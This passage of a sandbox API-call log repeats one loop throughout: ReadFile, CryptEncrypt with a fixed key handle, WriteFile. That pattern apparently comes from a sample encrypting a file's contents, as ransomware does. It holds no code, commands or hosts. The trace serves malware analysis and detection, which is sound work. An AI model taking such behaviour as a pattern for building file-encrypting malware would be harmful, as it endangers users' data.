pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.815] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.815] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.815] CryptEncrypt (in: hKey=0x2fc248, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.815] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.815] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.815] CryptEncrypt (in: hKey=0x2fc248, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.815] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.815] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.815] CryptEncrypt (in: hKey=0x2fc248, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.815] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.815] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.816] CryptEncrypt (in: hKey=0x2fc248, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.816] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.816] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.816] CryptEncrypt (in: hKey=0x2fc248, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.816] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.816] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.816] CryptEncrypt (in: hKey=0x2fc248, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.816] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.816] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.816] CryptEncrypt (in: hKey=0x2fc248, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.816] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.816] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.816] CryptEncrypt (in: hKey=0x2fc248, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.817] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.817] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.817] CryptEncrypt (in: hKey=0x2fc248, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.817] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.817] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.817] CryptEncrypt (in: hKey=0x2fc248, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.817] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.817] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.817] CryptEncrypt (in: hKey=0x2fc248, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.818] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.818] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.818] CryptEncrypt (in: hKey=0x2fc248, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.818] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.818] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.818] CryptEncrypt (in: hKey=0x2fc248, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.818] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.818] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.818] CryptEncrypt (in: hKey=0x2fc248, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.818] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.818] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.818] CryptEncrypt (in: hKey=0x2fc248, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.818] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.819] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.819] CryptEncrypt (in: hKey=0x2fc248, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.819] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.819] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.819] CryptEncrypt (in: hKey=0x2fc248, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.819] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.819] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.819] CryptEncrypt (in: hKey=0x2fc248, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.819] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.819] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.819] CryptEncrypt (in: hKey=0x2fc248, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.819] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.820] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.820] CryptEncrypt (in: hKey=0x2fc248, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.820] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.820] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.820] CryptEncrypt (in: hKey=0x2fc248, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.820] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.820] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.820] CryptEncrypt (in: hKey=0x2fc248, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.820] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.820] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.820] CryptEncrypt (in: hKey=0x2fc248, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.820] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.820] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.821] CryptEncrypt (in: hKey=0x2fc248, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.821] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.821] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.821] CryptEncrypt (in: hKey=0x2fc248, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.821] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.821] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.821] CryptEncrypt (in: hKey=0x2fc248, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.821] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.821] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.821] CryptEncrypt (in: hKey=0x2fc248, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.821] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.821] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.822] CryptEncrypt (in: hKey=0x2fc248, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.822] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.822] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.822] CryptEncrypt (in: hKey=0x2fc248, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.822] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.822] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.822] CryptEncrypt (in: hKey=0x2fc248, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.822] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.822] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.822] CryptEncrypt (in: hKey=0x2fc248, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.822] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.822] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.822] CryptEncrypt (in: hKey=0x2fc248, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.823] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: 